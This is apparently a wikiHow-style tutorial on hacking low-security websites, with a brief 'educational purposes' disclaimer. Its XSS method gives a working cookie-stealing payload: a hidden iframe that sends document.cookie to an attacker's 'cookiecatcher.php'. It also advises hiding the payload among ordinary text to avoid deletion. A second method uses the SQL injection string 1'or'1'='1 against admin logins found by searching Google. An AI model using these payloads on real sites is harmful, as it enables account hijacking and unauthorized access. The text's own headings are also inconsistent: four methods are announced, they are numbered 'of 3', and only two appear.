4 Basic ways How to Hack a Website

Using Cross Site ScriptingExecuting Injection AttacksSetting Up for SuccessSample Cookie Catcher Code

Edited by Teresa, Anonymo, Puddy, Blizzerand and 29 others

Please Note: This 'How To' is strictly for educational purposes only, either to help people begin to learn whitehat hacking or to see how hackers work in order to protect their own sites better. This tutorial will provide you with the steps on how to gain access to many low security websites.

Method 1 of 3: Using Cross Site Scripting

1. 1
   Find a vulnerable site where you can post content. A message board is a good example. Remember, if the site is secure then this will not work.
   Ad
2. 2
   Go to create a post. You will need to type some special code into the “post” which will capture the data of all who click on it.
   • You’ll want to test to see if the system filters out code. Post <script...>alert(“test”)</...script> (but remove the “…”). If an alert box appears when you click on your post, then the site is vulnerable to attack.
3. 3
   Create and upload your cookie catcher. The goal of this attack is to capture a user’s cookies, which allows you access to their account for websites with vulnerable logins. You’ll need a cookie catcher, which will capture your target’s cookies and reroute them. Upload the catcher to a website you have access to and that supports php. An example cookie catcher code can be found in the sample section.
4. 4
   Post with your cookie catcher. Input a proper code into the post which will capture the cookies and sent them to your site. You will want to put in some text after the code to reduce suspicion and keep your post from being deleted.
   • An example code would look like <...iframe... frameborder= 0 height=0 width=0 src=javascript...:void(document.location=”YOURURL/cookiecatcher.php?c=”+document.cookie)><.../iframe> (but remove the ...).
5. 5
   Use the collected cookies. After this, you can use the cookie information, which should be saved to your website, for whatever purpose you need.

Method 2 of 3: Executing Injection Attacks

1. 1
   Find a vulnerable site. You will need to find a site that is vulnerable, due to an easily accessible admin login. Try searching Google for admin login.asp.
2. 2
   Login as an admin. Type admin as the username and use one of a number of different strings as the password. These can be any one of a number of different strings but a common example is 1’or’1’=’1.
3. 3
   Be patient. This is probably going to require a little trial and error.
4. 4
   Access the website. Eventually, you should be able to find a string that allows you admin access to a website, assuming the website is vulnerable to attack.